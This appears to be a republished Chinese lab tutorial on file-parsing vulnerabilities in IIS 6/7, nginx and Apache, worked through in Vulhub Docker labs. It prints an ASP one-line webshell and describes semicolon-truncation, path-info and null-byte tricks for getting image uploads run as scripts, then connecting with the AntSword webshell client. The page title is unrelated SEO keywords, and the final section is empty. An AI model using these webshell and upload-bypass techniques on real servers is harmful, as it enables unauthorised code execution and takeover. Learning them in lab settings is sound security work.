您的位置:首页 > 健康 > 美食 > 重庆地产网站建设方案_网站服务器名字_汕头自动seo_今日最新闻

重庆地产网站建设方案_网站服务器名字_汕头自动seo_今日最新闻

2024/12/26 23:59:58 来源:https://blog.csdn.net/l258282/article/details/144654293  浏览:    关键词:重庆地产网站建设方案_网站服务器名字_汕头自动seo_今日最新闻
重庆地产网站建设方案_网站服务器名字_汕头自动seo_今日最新闻

IIS解析漏洞

IIS6.X

#环境
Windows Server 2003

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>
#asp一句话
<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg

后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

php.ini里的cgi.fix_pathinfo=1 开启

IIS7在Fast-CGI运行模式下

#环境
PHPstudy for IIS

配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启

IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾

然后在网站下创建我们的shell;并命名为1.jpg

去网站访问他

加上/.php就可以被解析为php文件

蚁剑连接一下

nginx解析漏洞

靶场安装

docker

查看docker容器是否安装,若未安装,执行下面的命令

yum install docker
yum install docker-compose
docker -v
docker-compose -v
yum install git
git clone https://github.com/vulhub/vulhub.git
ls

cd vulhub/

1.Vulhub靶场nginx_parsing

我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境

cd nginx/
ls

选择这一关进入

cd nginx_parsing_vulnerability/
docker-compose up -d

docker ps

这样就可以看到这一关的端口号为:80,浏览器访问

写一个图片马

2.Vulhub靶场CVE-2013-4547

我们可以发现里面有很多靶场,找到我们需要的nginx靶场环境

cd nginx/
ls

选择这一关进入

cd CVE-2013-4547/
docker-compose up -d

docker ps

这样就可以看到这一关的端口号为:8080,浏览器访问

修改为00,然后放行

Apache解析漏洞

1.Vulhub靶场apache_parsing_vulnerability

我们可以发现里面有很多靶场,找到我们需要的靶场环境

cd vulhub/
cd  httpd/ 
ls

选择这一关进入

cd apache_parsing_vulnerability/
docker-compose up -d

docker ps

这样就可以看到这一关的端口号为:8080,浏览器访问

警告不用搭理

用蚁剑连接

2.Vulhub靶场CVE-2017-15715

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com